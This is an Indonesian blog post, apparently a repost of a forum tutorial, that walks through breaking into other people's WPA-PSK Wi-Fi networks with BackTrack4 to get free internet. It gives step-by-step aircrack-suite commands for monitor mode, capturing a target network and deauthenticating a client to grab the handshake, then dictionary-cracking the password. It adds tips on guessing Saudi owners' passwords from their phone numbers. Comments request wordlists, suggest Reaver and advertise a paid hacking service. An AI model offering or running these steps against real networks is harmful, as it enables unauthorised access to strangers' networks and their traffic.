" Hack Bobol kunci Wifi WPA-PSK Menggunakan BackTrack4 - Komunitas Backtrack Kuli Di Saudi
Tukang Taman Murah : Jual Macam-macam Tanaman Hias, Rumput Golf, Rumput Gajah Mini dll.
Telpon : 0812 88 735845   
E-Mail  :jualtanamanhias@yahoo.com   Website : www.http://kebonkembangbogor.blogspot.com/

INGIN MENAMBAHKAN POSTING, INFORMASI,WORDLIS SEKILAS BOBOL WPA, UNTUK DI BAGI2. SILAHKAN TINGGALKAN PESAN,,,

Rabu, 29 September 2010

Hack Bobol kunci Wifi WPA-PSK Menggunakan BackTrack4


Dengan cara membobol Kuci Wpa Kita akan mendapatkan jaringan internet yang gratis tapi dosa tanggung sendiri Ini sedikit dari pengalaman saya di saudi, karena disini yang namanya hospot yang menggunakan WEP/WPA sangatlah banyak. Kadang kadang wifi di Saudi kalo penggunanya perempuan jarang di kunci dan ada juga yang menggunakan Pasword. Biasanya kalo di Saudi menggunakan password dengan nomor telpon yang empunya hospot itu.sendiri...itu bisa di jadikan alternatif.
 Yang perlu di persiapkan adalah CD Backtrack4 dan Kumpulan Pasword nya Biasa di bilang List dalam bentuk TXT
1. Masukan CD Backtrack4 tadi kedalam DVD Room
2. Trus masuk ke dekstop dengan perintah ~# startx
3. buka konsole dan ketikkan perintah :~# ifconfig -a

4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)

5. :~# airmon-ng
:~# airmon-ng start wlan0[/color] (tuk membuat virtual interface mode monitor)

6. ~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar)
[color=blue]mon0 adalah interface virtual hasil dari airmon-ng tadi



hasil dari airodump-ng mon0


7. :~# airodump-ng -w test –channel 11 –bssid 00904c910001 mon0
(tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘test’)


8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0
(aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth [/list]


9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt
inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt[/color]

sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya…jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.
Nb : Original post by : Neo
at Komunitas Backtrack Indonesia Forum Index » Tutorial, Tips, dan Trick Backtrack
follow this link for disscussion board
http://indobacktrack.or.id/forum/viewtopic.php?t=695&highlight=tutorial+cracking+wpapsk

Berbagi Pengetahuan Tentang Hack Wpa yang perdana sampai disini dulu, nanti saya sambung lagi di lain kesempatan. Dan kalo anda mau download silahkan kunjungi http://www.abun789.co.cc/2010/08/cara-membuka-pasword-wpawpa2-wep-dengan.html

12 komentar:

  1. brow kirimi tutornya donk...gondoqu@yahoo.com,trimakasih banyak sebelumnya

    BalasHapus
  2. bobol tanpa dictionary pakai apa ya....?

    BalasHapus
  3. ohya gan...mau tanya cara nginstall spoon wep/wpa di backtrack 4 gmn ya...sebelum masuk backtrack atau sesudah nya?

    BalasHapus
  4. brow gimna gue tunggu?

    BalasHapus
  5. Komentar ini telah dihapus oleh penulis.

    BalasHapus
  6. kalau ada minta dictionary wordlist untuk saudia dunk

    BalasHapus
    Balasan
    1. http://hackwifisaudi.blogspot.com/2011/11/koleksi-wordlist-wpa-gratis-download.html

      Hapus
  7. mas kalo untuk yg berada di taiwan untuk wordlist bgaimana? mohon di kasih wordlist taiwan gt,takutnya dia gunain huruf2 pingyin gt.

    BalasHapus
    Balasan
    1. COBA PAKE REAVER, SOALNYA KLO REAVER GA PAKE WORDLIS

      Hapus
  8. pusing y pake wordlist belum tentu kena ,betul ga???

    Hacker WPA/WPA2 **TANPA** menggunakan wordlist/dictionary di jamin 100% ampuh ,gw iyan asli bandung tp sekarang lagi di jeddah bagi temen2 yg susah sinyal di rumahnya khusus daerah jeddah .hubungi : YM iyan_yudiarna

    maaf yg luar jeddah sy menyediakan jasa jual ilmu hacker WPA.

    BalasHapus
  9. PAKE REAVER BISATUH TANPA WORDLIST CUMA GA SEMUA WPA

    BalasHapus

SILAHKNAN TINGGALKAN PESAN ANDA LEWAT KOMENTAR ATAU SARAN DIBAWAH INI. BISA MENGGUNAKAN AKUN GOOGLE, YAHOO, FACEBOOK, ATAU MASUKAN NAMA AJA
{ pasword = abunbogor"}